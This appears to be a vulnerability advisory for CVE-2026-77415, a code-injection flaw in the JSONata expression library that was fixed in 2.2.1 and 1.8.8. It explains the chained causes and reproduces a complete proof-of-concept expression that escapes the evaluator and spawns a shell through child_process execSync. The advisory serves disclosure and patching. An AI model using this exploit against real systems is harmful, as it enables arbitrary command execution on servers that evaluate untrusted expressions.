CVE-2026-77415

ADVISORY - github

Summary

Before JSONata 2.2.1 and 1.8.8 it was possible to execute arbitrary code with crafted expressions, due to:

  • overwriting $clone allowing mutation of objects via transforms (see evaluateTransformExpression)
  • it being possible to destruct jsonata functions/lambdas (e.g. $merge.*)
  • applyProcedure using proc.arguments.forEach and not Array.prototype.forEach

Which could be chained to execute arbitrary code.

This was fixed with:

Which are included in the 2.2.1 release. Fixes were then back-ported to the 1.8.8 release.

PoC

import jsonata from "jsonata";

const expression = jsonata(`
(
    $obj := {};
    $clone := function($o) { $o };
    $m := ($merge.*)[1];

    $fn := function($a) {
        (
            $a({"value":"lg"},"__lookupGetter__");
            $a({"value":"x"},"x");
        )
    };

    $nop := function() { $ };

    $capture := function($val) {
        $obj ~> | $obj | {"x": 1, "y": 1, "lg":$lg} |
    };

    $ ~> | $ | $m([$nop,{"_jsonata_lambda":false}])|;
    $ ~> | $ | {"arguments":{"forEach": $spread($fn)}}|;
    $ ~> | $ | {"body":$m([$capture,{"_jsonata_lambda":false}]).body}|;
    $func := $m([$,{"_jsonata_lambda":true}]);
    $func();

    $gP := $obj.lg("__proto__");

    $afn:=$spread($fn);
    $afn{"x":$gP().constructor("return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'})")()};
)
`);

await expression.evaluate({});

References

Common Weakness Enumeration (CWE)

ADVISORY - nist

Improper Control of Generation of Code ('Code Injection')

ADVISORY - github

Improper Control of Generation of Code ('Code Injection')


Sign in to Docker Scout

See which of your images are affected by this CVE and how to fix them by signing into Docker Scout.

Sign in